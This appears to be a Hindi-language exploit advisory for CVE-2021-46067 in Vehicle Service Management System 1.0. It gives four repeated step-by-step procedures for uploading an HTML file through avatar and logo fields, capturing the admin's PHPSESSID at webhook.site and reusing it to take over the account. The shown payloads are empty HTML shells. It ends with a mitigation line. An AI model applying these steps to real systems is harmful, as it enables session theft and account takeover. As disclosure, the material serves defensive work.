CVE-2021-46067
शोषण शीर्षक: वाहन सेवा प्रबंधन प्रणाली - 'एकाधिक' कुकी चोरी पूर्ण खाता अधिग्रहण की ओर ले जाती है
CVE: CVE-2021-46067
CVSS: 9.8 CRITICAL
संदर्भ:
विवरण:
वाहन सेवा प्रबंधन प्रणाली 1.0 में एक हमलावर कुकीज़ चुरा सकता है जिससे पूर्ण खाता अधिग्रहण होता है।
1. वाहन सेवा प्रबंधन प्रणाली - 'मेरा खाता' (/admin/?page=user)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
- मेरा खाता अनुभाग http://localhost/vehicle_service/admin/?page=user पर जाएँ
- वेबहुक URL उत्पन्न करें - https://webhook.site
- वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।
पेलोड:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
- मेरा खाता अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार (Avatar) में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- अवतार छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
- हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
- PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
- एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
- कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
- अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
- खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।
2. वाहन सेवा प्रबंधन प्रणाली - 'उपयोगकर्ता सूची' (/admin/?page=user/manage_user)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
- उपयोगकर्ता सूची अनुभाग पर जाएँ और नया बनाएँ बटन पर क्लिक करें।
- वेबहुक URL उत्पन्न करें - https://webhook.site
- वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।
पेलोड:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
- नया उपयोगकर्ता बनाएँ अनुभाग में सभी आवश्यक विवरण दर्ज करें और अवतार (Avatar) में HTML फ़ाइल ब्राउज़ करें।
- सेव बटन पर क्लिक करें।
- अवतार छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
- हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
- PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
- एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
- कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
- अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
- खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।
3. वाहन सेवा प्रबंधन प्रणाली - 'सेटिंग्स-सिस्टम लोगो' (/admin/?page=system_info)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
- सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएँ
- वेबहुक URL उत्पन्न करें - https://webhook.site
- वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।
पेलोड:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
- सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और सिस्टम लोगो में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- सिस्टम लोगो छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
- हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
- PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
- एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
- कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
- अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
- खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।
4. वाहन सेवा प्रबंधन प्रणाली - 'सेटिंग्स-वेबसाइट कवर' (/admin/?page=system_info)
शोषण:
- एडमिन पैनल http://localhost/vehicle_service/admin में लॉगिन करें
- सेटिंग्स अनुभाग http://localhost/vehicle_service/admin/?page=system_info पर जाएँ
- वेबहुक URL उत्पन्न करें - https://webhook.site
- वेबहुक अद्वितीय URL कॉपी करें और इसे नीचे दिए गए HTML कोड में चिपकाएँ।
पेलोड:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- उपरोक्त HTML कोड को उदाहरण के लिए Cookie Stealing.html नाम से सेव करें
- सेटिंग्स अनुभाग में सभी आवश्यक विवरण दर्ज करें और वेबसाइट कवर में HTML फ़ाइल ब्राउज़ करें।
- अपडेट बटन पर क्लिक करें।
- वेबसाइट कवर छवि को एक नए टैब में खोलें और वेबहुक स्थिति जांचें।
- हमें अनुरोध प्राप्त हुआ इसमें PHPSESSID है।
- PHPSESSID मान कॉपी करें और कोई अन्य ब्राउज़र खोलें।
- एडमिन पैनल http://localhost/vehicle_service/admin पर जाएँ
- कुकी मानों की जाँच करें और PHPSESSID मान को कॉपी किए गए PHPSESSID मान में बदलें।
- अब एडमिन पैनल http://localhost/vehicle_service/admin तक पहुँचें
- खाते में सफलतापूर्वक लॉग इन किया। खाता अधिग्रहण सफल।
प्रभाव:
एक हमलावर दुर्भावनापूर्ण HTML फ़ाइल अपलोड करता है यह तीसरे पक्ष की वेबसाइट पर रीडायरेक्ट करता है और अनुरोध में कुकीज़ उजागर हो जाती हैं। इससे पूर्ण खाता अधिग्रहण होता है।
शमन:
फ़ाइल अपलोड कार्यक्षमता को मान्य करने और सत्र में द्वितीयक जाँच करने की अनुशंसा की जाती है।